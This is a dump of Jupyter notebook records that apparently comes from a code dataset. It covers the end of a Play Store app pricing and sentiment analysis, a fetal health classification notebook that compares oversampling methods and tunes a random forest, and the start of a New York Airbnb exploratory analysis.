"# Select apps priced below $100\napps_under_100 =popular_app_cats[popular_app_cats[\"Price\"]<100]\n\nfig, ax = plt.subplots()\nfig.set_size_inches(15, 8)\n\n# Examine price vs category with the authentic apps\nax = sns.stripplot(x=apps_under_100[\"Price\"], y=apps_under_100[\"Category\"], data=apps_under_100,\n jitter=True, linewidth=1)\nax.set_title('App pricing trend across categories after filtering for junk apps')",
"_____no_output_____"
]
],
[
[
"## 8. Popularity of paid apps vs free apps\n<p>For apps in the Play Store today, there are five types of pricing strategies: free, freemium, paid, paymium, and subscription. Let's focus on free and paid apps only. Some characteristics of free apps are:</p>\n<ul>\n<li>Free to download.</li>\n<li>Main source of income often comes from advertisements.</li>\n<li>Often created by companies that have other products and the app serves as an extension of those products.</li>\n<li>Can serve as a tool for customer retention, communication, and customer service.</li>\n</ul>\n<p>Some characteristics of paid apps are:</p>\n<ul>\n<li>Users are asked to pay once for the app to download and use it.</li>\n<li>The user can't really get a feel for the app before buying it.</li>\n</ul>\n<p>Are paid apps installed as much as free apps? It turns out that paid apps have a relatively lower number of installs than free apps, though the difference is not as stark as I would have expected!</p>",
"_____no_output_____"
]
],
[
[
"trace0 = go.Box(\n # Data for paid apps\n y=apps[apps['Type'] == 'Paid']['Installs'],\n name = 'Paid'\n)\n\ntrace1 = go.Box(\n # Data for free apps\n y=apps[apps['Type'] == 'Free']['Installs'],\n name = 'Free'\n)\n\nlayout = go.Layout(\n title = \"Number of downloads of paid apps vs. free apps\",\n yaxis = dict(\n type = 'log',\n autorange = True\n )\n)\n\n# Add trace0 and trace1 to a list for plotting\ndata = [trace0,trace1]\nplotly.offline.iplot({'data': data, 'layout': layout})",
"_____no_output_____"
]
],
[
[
"## 9. Sentiment analysis of user reviews\n<p>Mining user review data to determine how people feel about your product, brand, or service can be done using a technique called sentiment analysis. User reviews for apps can be analyzed to identify if the mood is positive, negative or neutral about that app. For example, positive words in an app review might include words such as 'amazing', 'friendly', 'good', 'great', and 'love'. Negative words might be words like 'malware', 'hate', 'problem', 'refund', and 'incompetent'.</p>\n<p>By plotting sentiment polarity scores of user reviews for paid and free apps, we observe that free apps receive a lot of harsh comments, as indicated by the outliers on the negative y-axis. Reviews for paid apps appear never to be extremely negative. This may indicate something about app quality, i.e., paid apps being of higher quality than free apps on average. The median polarity score for paid apps is a little higher than free apps, thereby syncing with our previous observation.</p>\n<p>In this notebook, we analyzed over ten thousand apps from the Google Play Store. We can use our findings to inform our decisions should we ever wish to create an app ourselves.</p>",
"_____no_output_____"
]
],
[
[
"# Load user_reviews.csv\nreviews_df = pd.read_csv('datasets/user_reviews.csv')\n\n# Join and merge the two dataframe\nmerged_df = pd.merge(apps, reviews_df, on = 'App', how = \"inner\")\n\n# Drop NA values from Sentiment and Translated_Review columns\nmerged_df = merged_df.dropna(subset=['Sentiment', 'Translated_Review'])\n\nsns.set_style('ticks')\nfig, ax = plt.subplots()\nfig.set_size_inches(11, 8)\n\n# User review sentiment polarity for paid vs. free apps\nax = sns.boxplot(x = 'Type', y = 'Sentiment_Polarity', data = merged_df)\nax.set_title('Sentiment Polarity Distribution')",
"_____no_output_____"
],
[
"reviews_df",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb02a74d19e76e76af3ef741404192714eff98ee | 592,173 | ipynb | Jupyter Notebook | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | 1 | 2021-03-15T10:43:42.000Z | 2021-03-15T10:43:42.000Z | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | null | null | null | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | null | null | null | 176.294433 | 354,514 | 0.811143 | [
[
[
"<center>\r\n <h1>Fetal Health Classification</h1>\r\n <img src=\"https://blog.pregistry.com/wp-content/uploads/2018/08/AdobeStock_90496738.jpeg\">\r\n <small>Source: Google</small>\r\n</center>\r\n\r\n <p>\r\n Fetal mortality refers to stillbirths or fetal death. It encompasses any death of a fetus after 20 weeks of gestation.\r\n\r\n Cardiotocograms (CTGs) are a simple and cost accessible option to assess fetal health, allowing healthcare professionals to take action in order to prevent child and maternal mortality.\r\n \r\n Cardiotocography is a technical means of recording the fetal heartbeat and the uterine contractions during pregnancy. It is most commonly used in the third trimester and its purpose is to monitor fetal well-being and allow early detection of fetal distress. An abnormal CTG may indicate the need for further investigations and potential intervention.\r\n </p>",
"_____no_output_____"
]
],
[
[
"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns",
"_____no_output_____"
],
[
"df = pd.read_csv('../Datasets/fetal_health.csv')",
"_____no_output_____"
]
],
[
[
"| Variable symbol |\tVariable description|\r\n| ----------------|---------------------|\r\n|LB\t| Fetal heart rate baseline (beats per minute)|\r\n|AC\t| Number of accelerations per second|\r\n|FM\t| Number of fetal movements per second|\r\n|UC\t| Number of uterine contractions per second|\r\n|DL\t| Number of light decelerations per second|\r\n|DS\t| Number of severe decelerations per second|\r\n|DP\t| Number of prolonged decelerations per second|\r\n|ASTV\t| Percentage of time with abnormal short-term variability|\r\n|MSTV\t| Mean value of short-term variability|\r\n|ALTV\t| Percentage of time with abnormal long-term variability|\r\n|MLTV\t| Mean value of long-term variability|\r\n|Width\t| Width of FHR histogram|\r\n|Min\t| Minimum of FHR histogram|\r\n|Max\t| Maximum of FHR histogram|\r\n|Nmax\t| Number of histogram peaks|\r\n|Nzeros\t| Number of histogram zeroes|\r\n|Mode\t| Histogram mode|\r\n|Median\t| Histogram median|\r\n|Variance\t| Histogram variance|\r\n|Tendency |\tHistogram tendency|\r\n|NSP\t| Fetal state class code (N=Normal, S=Suspected,P=Pathological)|\r\n",
"_____no_output_____"
],
[
"Reference: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6822315/\r\n",
"_____no_output_____"
]
],
[
[
"df.head()",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2126 entries, 0 to 2125\nData columns (total 22 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 baseline value 2126 non-null float64\n 1 accelerations 2126 non-null float64\n 2 fetal_movement 2126 non-null float64\n 3 uterine_contractions 2126 non-null float64\n 4 light_decelerations 2126 non-null float64\n 5 severe_decelerations 2126 non-null float64\n 6 prolongued_decelerations 2126 non-null float64\n 7 abnormal_short_term_variability 2126 non-null float64\n 8 mean_value_of_short_term_variability 2126 non-null float64\n 9 percentage_of_time_with_abnormal_long_term_variability 2126 non-null float64\n 10 mean_value_of_long_term_variability 2126 non-null float64\n 11 histogram_width 2126 non-null float64\n 12 histogram_min 2126 non-null float64\n 13 histogram_max 2126 non-null float64\n 14 histogram_number_of_peaks 2126 non-null float64\n 15 histogram_number_of_zeroes 2126 non-null float64\n 16 histogram_mode 2126 non-null float64\n 17 histogram_mean 2126 non-null float64\n 18 histogram_median 2126 non-null float64\n 19 histogram_variance 2126 non-null float64\n 20 histogram_tendency 2126 non-null float64\n 21 fetal_health 2126 non-null float64\ndtypes: float64(22)\nmemory usage: 365.5 KB\n"
],
[
"df.describe()",
"_____no_output_____"
],
[
"df.isna().sum()",
"_____no_output_____"
]
],
[
[
"Thankfully, there are no NaN values in the dataset.",
"_____no_output_____"
]
],
[
[
"sns.countplot(x='fetal_health', data=df)\r\nprint(df['fetal_health'].value_counts())",
"1.0 1655\n2.0 295\n3.0 176\nName: fetal_health, dtype: int64\n"
]
],
[
[
"We can see that there is the problem of class imbalance in this dataset. This means we cannot use **accuracy** as a metric to evaluate the performance of our model. The most appropiate metric for model evaluation can be:\r\n1. F1 Score\r\n2. Recall\r\n3. Precision",
"_____no_output_____"
],
[
"Before diving deep into understanding the data and features, let us first look at what does the three different categories of fetal_health represent. Please refer to the table below for the same.\r\n\r\nReference: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4812878/",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"corr = df.corr()\r\n\r\nplt.figure(figsize=(24, 20))\r\nsns.heatmap(corr, annot=True)\r\nplt.title(\"Correlation Matrix\")\r\nplt.show()",
"_____no_output_____"
]
],
[
[
"From the above correlation matrix, we can observe that the following features show some correlation with target variable fetal health:\r\n\r\n1. accelerations (negative corr)\r\n2. uterine contractions (negative corr)\r\n3. prolonged_decelerations (positive corr)\r\n4. abnormal short term variability (positive corr)\r\n5. percentage of time with abnormal long term variability (positive corr)\r\n\r\n",
"_____no_output_____"
],
[
"## Model Selection",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import classification_report, f1_score, recall_score, precision_score",
"_____no_output_____"
],
[
"print(\"There are total \"+str(len(df))+\" rows in the dataset\")",
"There are total 2126 rows in the dataset\n"
],
[
"X = df.drop([\"fetal_health\"],axis=1)\r\nY = df[\"fetal_health\"]",
"_____no_output_____"
],
[
"std_scale = StandardScaler()\r\nX_sc = std_scale.fit_transform(X)",
"_____no_output_____"
],
[
"X_train, X_test, y_train,y_test = train_test_split(X_sc, Y, test_size=0.25, random_state=42)\r\nprint(\"There are total \"+str(len(X_train))+\" rows in training dataset\")\r\nprint(\"There are total \"+str(len(X_test))+\" rows in test dataset\")",
"There are total 1594 rows in training dataset\nThere are total 532 rows in test dataset\n"
]
],
[
[
"If you remember, in the initial investigation of the data, we found out that we have imbalanced classes. \r\n\r\nTo handle the problem of imbalanced classes, we can use oversampling techniques. In oversampling, we populate the minority classes with some synthetic data. \r\n\r\nLet us try some oversampling techniques and judge their performance on the above dataset.",
"_____no_output_____"
],
[
"1. SMOTE Technique",
"_____no_output_____"
]
],
[
[
"from imblearn.over_sampling import SMOTE\r\nsmt = SMOTE()\r\nX_train_sm, y_train_sm = smt.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/externals/six.py:31: FutureWarning: The module is deprecated in version 0.21 and will be removed in version 0.23 since we've dropped support for Python 2.7. Please rely on the official version of six (https://pypi.org/project/six/).\n \"(https://pypi.org/project/six/).\", FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:144: FutureWarning: The sklearn.neighbors.base module is deprecated in version 0.22 and will be removed in version 0.24. The corresponding classes / functions should instead be imported from sklearn.neighbors. Anything that cannot be imported from sklearn.neighbors is now part of the private API.\n warnings.warn(message, FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
[
[
"2. ADASYN",
"_____no_output_____"
]
],
[
[
"from imblearn.over_sampling import ADASYN\r\nada = ADASYN(random_state=130)\r\nX_train_ada, y_train_ada = ada.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
[
[
"3. SMOTE + Tomek Links",
"_____no_output_____"
]
],
[
[
"from imblearn.combine import SMOTETomek\r\nsmtom = SMOTETomek(random_state=139)\r\nX_train_smtom, y_train_smtom = smtom.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
[
[
"4. SMOTE + ENN",
"_____no_output_____"
]
],
[
[
"from imblearn.combine import SMOTEENN\r\nsmenn = SMOTEENN()\r\nX_train_smenn, y_train_smenn = smenn.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
],
[
"def evaluate_model(clf, X_test, y_test, model_name, oversample_type):\r\n print('--------------------------------------------')\r\n print('Model ', model_name)\r\n print('Data Type ', oversample_type)\r\n y_pred = clf.predict(X_test)\r\n f1 = f1_score(y_test, y_pred, average='weighted')\r\n recall = recall_score(y_test, y_pred, average='weighted')\r\n precision = precision_score(y_test, y_pred, average='weighted')\r\n print(classification_report(y_test, y_pred))\r\n print(\"F1 Score \", f1)\r\n print(\"Recall \", recall)\r\n print(\"Precision \", precision)\r\n return [model_name, oversample_type, f1, recall, precision]",
"_____no_output_____"
],
[
"models = {\r\n 'DecisionTrees': DecisionTreeClassifier(random_state=42),\r\n 'RandomForest':RandomForestClassifier(random_state=42),\r\n 'LinearSVC':LinearSVC(random_state=0),\r\n 'AdaBoostClassifier':AdaBoostClassifier(random_state=42),\r\n 'SGD':SGDClassifier()\r\n}",
"_____no_output_____"
],
[
"oversampled_data = {\r\n 'ACTUAL':[X_train, y_train],\r\n 'SMOTE':[X_train_sm, y_train_sm],\r\n 'ADASYN':[X_train_ada, y_train_ada],\r\n 'SMOTE_TOMEK':[X_train_smtom, y_train_smtom],\r\n 'SMOTE_ENN':[X_train_smenn, y_train_smenn]\r\n}",
"_____no_output_____"
],
[
"final_output = []\r\nfor model_k, model_clf in models.items():\r\n for data_type, data in oversampled_data.items():\r\n model_clf.fit(data[0], data[1])\r\n final_output.append(evaluate_model(model_clf, X_test, y_test, model_k, data_type))",
"--------------------------------------------\nModel DecisionTrees\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.97 0.95 0.96 413\n 2.0 0.80 0.85 0.83 82\n 3.0 0.92 0.95 0.93 37\n\n accuracy 0.94 532\n macro avg 0.90 0.92 0.91 532\nweighted avg 0.94 0.94 0.94 532\n\nF1 Score 0.9386188989575975\nRecall 0.9379699248120301\nPrecision 0.9395945726899018\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE\n precision recall f1-score support\n\n 1.0 0.97 0.95 0.96 413\n 2.0 0.78 0.85 0.81 82\n 3.0 0.89 0.92 0.91 37\n\n accuracy 0.93 532\n macro avg 0.88 0.91 0.89 532\nweighted avg 0.94 0.93 0.94 532\n\nF1 Score 0.9353761392465251\nRecall 0.9342105263157895\nPrecision 0.9372894575765451\n--------------------------------------------\nModel DecisionTrees\nData Type ADASYN\n precision recall f1-score support\n\n 1.0 0.96 0.94 0.95 413\n 2.0 0.72 0.74 0.73 82\n 3.0 0.81 0.92 0.86 37\n\n accuracy 0.91 532\n macro avg 0.83 0.87 0.85 532\nweighted avg 0.91 0.91 0.91 532\n\nF1 Score 0.907024687891699\nRecall 0.9060150375939849\nPrecision 0.9087291056773587\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE_TOMEK\n precision recall f1-score support\n\n 1.0 0.96 0.92 0.94 413\n 2.0 0.70 0.80 0.75 82\n 3.0 0.81 0.95 0.88 37\n\n accuracy 0.91 532\n macro avg 0.83 0.89 0.86 532\nweighted avg 0.91 0.91 0.91 532\n\nF1 Score 0.9085763604555944\nRecall 0.9060150375939849\nPrecision 0.9136330309611457\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE_ENN\n precision recall f1-score support\n\n 1.0 0.97 0.90 0.93 413\n 2.0 0.66 0.79 0.72 82\n 3.0 0.67 0.95 0.79 37\n\n accuracy 0.89 532\n macro avg 0.77 0.88 0.81 532\nweighted avg 0.90 0.89 0.89 532\n\nF1 Score 0.8908802486423862\nRecall 0.8853383458646616\nPrecision 0.9039517574795236\n--------------------------------------------\nModel RandomForest\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.96 0.98 0.97 413\n 2.0 0.89 0.80 0.85 82\n 3.0 0.89 0.92 0.91 37\n\n accuracy 0.95 532\n macro avg 0.92 0.90 0.91 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9483607532081659\nRecall 0.9492481203007519\nPrecision 0.9482902223553192\n--------------------------------------------\nModel RandomForest\nData Type SMOTE\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.87 0.85 82\n 3.0 0.90 0.95 0.92 37\n\n accuracy 0.95 532\n macro avg 0.90 0.92 0.91 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9460401301254237\nRecall 0.9454887218045113\nPrecision 0.9469086136772796\n--------------------------------------------\nModel RandomForest\nData Type ADASYN\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.87 0.85 82\n 3.0 0.92 0.95 0.93 37\n\n accuracy 0.95 532\n macro avg 0.91 0.93 0.92 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.947869794112914\nRecall 0.9473684210526315\nPrecision 0.9485978811417629\n--------------------------------------------\nModel RandomForest\nData Type SMOTE_TOMEK\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.88 0.85 82\n 3.0 0.90 0.95 0.92 37\n\n accuracy 0.95 532\n macro avg 0.90 0.93 0.92 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9499069158934915\nRecall 0.9492481203007519\nPrecision 0.9509948611582005\n--------------------------------------------\nModel RandomForest\nData Type SMOTE_ENN\n precision recall f1-score support\n\n 1.0 0.99 0.91 0.94 413\n 2.0 0.67 0.89 0.76 82\n 3.0 0.80 0.95 0.86 37\n\n accuracy 0.91 532\n macro avg 0.82 0.91 0.86 532\nweighted avg 0.92 0.91 0.91 532\n\nF1 Score 0.9111118279507182\nRecall 0.9060150375939849\nPrecision 0.9246253769958906\n--------------------------------------------\nModel LinearSVC\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.94 0.94 0.94 413\n 2.0 0.67 0.63 0.65 82\n 3.0 0.73 0.81 0.77 37\n\n accuracy 0.88 532\n macro avg 0.78 0.79 0.79 532\nweighted avg 0.88 0.88 0.88 532\n\nF1 Score 0.8830104106419896\nRecall 0.8834586466165414\nPrecision 0.8829696191698759\n"
],
[
"final_df = pd.DataFrame(final_output, columns=['Model', 'DataType', 'F1', 'Recall', 'Precision'])",
"_____no_output_____"
],
[
"final_df.sort_values(by=\"F1\", ascending=False)",
"_____no_output_____"
]
],
[
[
"### Hyperparameter Tuning",
"_____no_output_____"
]
],
[
[
"param_grid = {\r\n 'criterion':['gini', 'entropy'],\r\n 'max_depth': [10, 20, 40, 80, 100],\r\n 'max_features': ['auto', 'sqrt'],\r\n 'n_estimators': [200, 400, 600, 800, 1000, 2000]\r\n}",
"_____no_output_____"
],
[
"rfc = RandomForestClassifier(random_state=42)\r\nrfc_cv = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5, verbose=2)\r\nrfc_cv.fit(X_train_smtom, y_train_smtom)",
"Fitting 5 folds for each of 120 candidates, totalling 600 fits\n[CV] criterion=gini, max_depth=10, max_features=auto, n_estimators=200 \n"
],
[
"rfc_cv.best_params_",
"_____no_output_____"
],
[
"rf = RandomForestClassifier(n_estimators=2000, criterion='entropy', max_depth=20, max_features='auto')\r\nrf.fit(X_train_smtom, y_train_smtom)\r\nevaluate_model(rf, X_test, y_test, 'RandomForest', 'SMOTE+TOMEK')",
"--------------------------------------------\nModel RandomForest\nData Type SMOTE+TOMEK\n precision recall f1-score support\n\n 1.0 0.98 0.97 0.97 413\n 2.0 0.85 0.89 0.87 82\n 3.0 0.90 0.97 0.94 37\n\n accuracy 0.95 532\n macro avg 0.91 0.94 0.93 532\nweighted avg 0.96 0.95 0.96 532\n\nF1 Score 0.9553939168600822\nRecall 0.9548872180451128\nPrecision 0.956360829901538\n"
],
[
"import pickle\r\nfilename = 'fetal-health-model.pkl'\r\npickle.dump(rf, open(filename, 'wb'))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb02c30e7127d37e08de1a380b624c2b39eea13e | 516,712 | ipynb | Jupyter Notebook | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | null | null | null | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | 2 | 2020-03-31T10:55:39.000Z | 2021-02-02T22:30:53.000Z | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | 2 | 2020-01-17T01:57:31.000Z | 2020-01-27T04:07:28.000Z | 438.262935 | 70,984 | 0.929843 | [
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import cm",
"_____no_output_____"
],
[
"data = pd.read_csv('AB_NYC_2019.csv')",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
]
],
[
[
"Printing the columns of the dataset, as well as their types. This is an important step because depending of the type of \ndata that we have, the treatment that we have to perform differs.",
"_____no_output_____"
]
],
[
[
"data.columns",
"_____no_output_____"
],
[
"data.describe()",
"_____no_output_____"
],
[
"data.pivot_table(index='neighbourhood_group',columns='room_type',values='price',aggfunc='mean')",
"_____no_output_____"
]
],
[
[
"The relation among neighbourhood group, room type and price give a geneneral idea about the data. ",
"_____no_output_____"
]
],
[
[
"data.drop(columns=['id', 'name', 'host_id', 'host_name'], inplace=True)",
"_____no_output_____"
],
[
"#visualize the categorical values for the neighbourhood_group\nplt.figure(figsize=(6,4))\ncount_neigh = data.neighbourhood_group.value_counts()\n(count_neigh/data.shape[0]).plot(kind='bar');\nplt.title('Percent of neighbourhood group', fontsize = 12)\nplt.ylabel('percent', fontsize = 12)\nplt.xlabel('neighbourhood group', fontsize = 12)",
"_____no_output_____"
]
],
[
[
"In the listed neighborhood group the amount of business in Manhattan is largest and in Staten Island is the smallest. This is expected because in Manhattan and Brooklyn the amount of tourist is higher than the other because of their diiferent attarction of tourists in the area. ",
"_____no_output_____"
]
],
[
[
"#visualize the categorical values for the room_type\nplt.figure(figsize=(7,5))\ncount_room = data.room_type.value_counts()\n(count_room/data.shape[0]).plot(kind='bar');\nplt.title('room_type')\nplt.ylabel('the percent of every room type')",
"_____no_output_____"
]
],
[
[
"This variable is an indication of the human prefence with the nature of house and status of privacy. In all nighborhood the amount of people serving in home/apartment and private room is higher than shared room. Shared room business in this specific area is generally not significance. ",
"_____no_output_____"
]
],
[
[
"# reference: https://seaborn.pydata.org/generated/seaborn.catplot.html\nplt.figure(figsize=(12,12))\nsns.set_context(\"paper\")\nsns.set(style=\"darkgrid\", font_scale=.9)\nsns.catplot(x=\"room_type\", y=\"price\", data=data);",
"_____no_output_____"
],
[
"data.groupby('room_type')[['price','number_of_reviews']].mean()",
"_____no_output_____"
]
],
[
[
"The Entire rooms/apartments cost are more than just a shared room, where as the differece in price of a shared room and a private one is about 20 dollars. In contrast, the number of viewrs are higher in private room than the other. This small price differece between private room and shared room may lead to prefer the private room. \n",
"_____no_output_____"
],
[
"The overall price in the entire home is more expensive than the others. The price of the shared price is lower than the others. ",
"_____no_output_____"
]
],
[
[
"def plot_price_wrt_room_type(data,title):\n data2 = data.pivot(columns='room_type',values='price')\n x1=list(data2[data2.columns[0]])\n x2=list(data2[data2.columns[1]])\n x3=list(data2[data2.columns[2]])\n\n plt.figure(figsize=(8, 6))\n plt.rc('legend',**{'fontsize':12})\n plt.legend(fontsize=15)\n plt.rcParams['figure.figsize']=(15,8)\n plt.style.use(style='ggplot')\n plt.tick_params(labelsize=12)\n plt.tick_params(labelsize=12)\n plt.ylabel(\"Count\",fontsize=12,color='black')\n plt.xlabel(\"Price\",fontsize=12,color='black')\n plt.title(title,fontsize=12,color='black')\n plt.legend(prop={'size': 10}) \n n_bins=12\n colors = ['orange', 'aqua', 'green']\n labels=[data2.columns[0],data2.columns[1],data2.columns[2]]\n plt.hist([x1, x2, x3], n_bins, histtype='bar', \n color=colors, range=[0,300],label=labels,alpha=1)\n \n plt.legend(loc=\"upper right\")\n plt.show()",
"_____no_output_____"
],
[
"title='Price distribution with respect to room type'\nplot_price_wrt_room_type(data,title)",
"No handles with labels found to put in legend.\nNo handles with labels found to put in legend.\n"
]
],
[
[
"Price distribution with room type is an indicator for the preference of the business by the customer. Hence, the graph indicates guests more prefer the private room and which it's price is relatively under the average of the others. ",
"_____no_output_____"
]
],
[
[
"def plot_price_wrt_neigbourhood_group(data,title):\n data2 = data.pivot(columns='neighbourhood_group',values='price')\n x1=list(data2[data2.columns[0]])\n x2=list(data2[data2.columns[1]])\n x3=list(data2[data2.columns[2]])\n x4=list(data2[data2.columns[3]])\n x5=list(data2[data2.columns[4]])\n\n plt.figure(figsize=(9, 7))\n plt.style.use(style='ggplot')\n plt.rc('legend',**{'fontsize':12})\n plt.tick_params(labelsize=25) \n plt.legend(fontsize=20)\n plt.rcParams['figure.figsize']=(15,8) \n plt.ylabel(\"Count\",fontsize=12,color='black')\n plt.xlabel(\"Price\",fontsize=12,color='black')\n plt.title(title,fontsize=12,color='black')\n plt.legend(prop={'size': 8}) \n plt.tick_params(labelsize=12)\n n_bins=12\n colors = ['yellow', 'red', 'green', 'black', 'blue']\n labels=[data2.columns[0],data2.columns[1],data2.columns[2], data2.columns[3], data2.columns[4]]\n plt.hist([x1, x2, x3, x4, x5], n_bins, histtype='bar', \n color=colors, range=[0,400],label=labels,alpha=1)\n \n plt.legend(loc=\"upper right\")\n plt.show()",
"_____no_output_____"
],
[
"title='plot_price_wrt_neigbourhood_group'\nplot_price_wrt_neigbourhood_group(data,title)",
"No handles with labels found to put in legend.\nNo handles with labels found to put in legend.\n"
]
],
[
[
"Neighbourhood Manhattan has highest price with high demand.The area is highly visited by the investor and having high demand and high price is expected.",
"_____no_output_____"
]
],
[
[
"#plt.subplot2grid((2,3), (0,0))\n#data.room_type[data.neighbourhood_group == \"..... \"].value_counts(normalize = True).plot(kind = \"bar\", alpha= 0.5)\n#plt.title(\"room_type with neigbourhood_group\")",
"_____no_output_____"
],
[
"plt.figure(figsize=(8,6))\ndata.boxplot(column='price', return_type='axes') \nplt.show()",
"_____no_output_____"
]
],
[
[
